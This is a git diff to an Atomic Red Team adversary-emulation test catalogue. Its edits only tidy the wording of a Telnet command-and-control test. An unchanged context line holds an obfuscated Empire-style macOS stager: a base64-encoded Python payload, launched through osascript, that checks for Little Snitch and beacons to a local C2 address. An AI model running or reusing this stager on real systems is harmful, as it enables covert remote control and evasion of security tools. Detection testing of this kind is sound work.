diff --git a/atomic-red-attacks.csv b/atomic-red-attacks.csv index fd1a1cc..45755a1 100644 --- a/atomic-red-attacks.csv +++ b/atomic-red-attacks.csv @@ -25533,9 +25533,9 @@ You can use netcat to listen for the connection and verify execution, e.g. use " Reference: https://github.com/EmpireProject/Empire ",macos,,,"osascript -e ""do shell script \""echo \\\""import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg=='));\\\"" | python &\"""" ",sh,,,,,, -T1071,Application Layer Protocol,Telnet C2,3b0df731-030c-4768-b492-2a3216d90e53,"An adversary may establish telnet communication from compromised endpoint to command and control (C2) server to be able to operate more attack on objectives. +T1071,Application Layer Protocol,Telnet C2,3b0df731-030c-4768-b492-2a3216d90e53,"An adversary may establish Telnet communication from a compromised endpoint to a command and control (C2) server in order to carry out additional attacks on objectives. ",windows,,,"#{client_path} #{server_ip} --port #{server_port} -",powershell,,,,powershell,"dependencies.0.description: Command and Control (C2) server cam be established by running PathToAtomicsFolder\T1071\bin\telnet_server.exe on specified server with specified IP that must be reachable by client (telnet_client.exe) +",powershell,,,,powershell,"dependencies.0.description: A command and control (C2) server can be established by running PathToAtomicsFolder\T1071\bin\telnet_server.exe on a specified server with a specified IP that must be reachable by a client (telnet_client.exe) dependencies.0.prereq_command: $connection = Test-NetConnection -ComputerName #{server_ip} -Port #{server_port} if ($connection.TcpTestSucceeded) {exit 0} else {exit 1} diff --git a/atomic-red-attacks.md b/atomic-red-attacks.md index bb2ad85..d909fda 100644 --- a/atomic-red-attacks.md +++ b/atomic-red-attacks.md @@ -13055,7 +13055,7 @@ | | | | | You can use netcat to listen for the connection and verify execution, e.g. use "nc -l 80" in another terminal window before executing this test and watch for the request. | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Reference: https://github.com/EmpireProject/Empire | | | | | | | | | | | | -| T1071 | Application Layer Protocol | Telnet C2 | 3b0df731-030c-4768-b492-2a3216d90e53 | An adversary may establish telnet communication from compromised endpoint to command and control (C2) server to be able to operate more attack on objectives. | windows | nan | nan | #{client_path} #{server_ip} --port #{server_port} | powershell | nan | nan | nan | powershell | dependencies.0.description: Command and Control (C2) server cam be established by running PathToAtomicsFolder\T1071\bin\telnet_server.exe on specified server with specified IP that must be reachable by client (telnet_client.exe) | input_arguments.server_ip.description: C2 server IP or URL | +| T1071 | Application Layer Protocol | Telnet C2 | 3b0df731-030c-4768-b492-2a3216d90e53 | An adversary may establish Telnet communication from a compromised endpoint to a command and control (C2) server in order to carry out additional attacks on objectives. | windows | nan | nan | #{client_path} #{server_ip} --port #{server_port} | powershell | nan | nan | nan | powershell | dependencies.0.description: A command and control (C2) server can be established by running PathToAtomicsFolder\T1071\bin\telnet_server.exe on a specified server with a specified IP that must be reachable by a client (telnet_client.exe) | input_arguments.server_ip.description: C2 server IP or URL | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | dependencies.0.prereq_command: $connection = Test-NetConnection -ComputerName #{server_ip} -Port #{server_port} | input_arguments.server_ip.type: url | | | | | | | | | | | | | | | | if ($connection.TcpTestSucceeded) {exit 0} else {exit 1} | |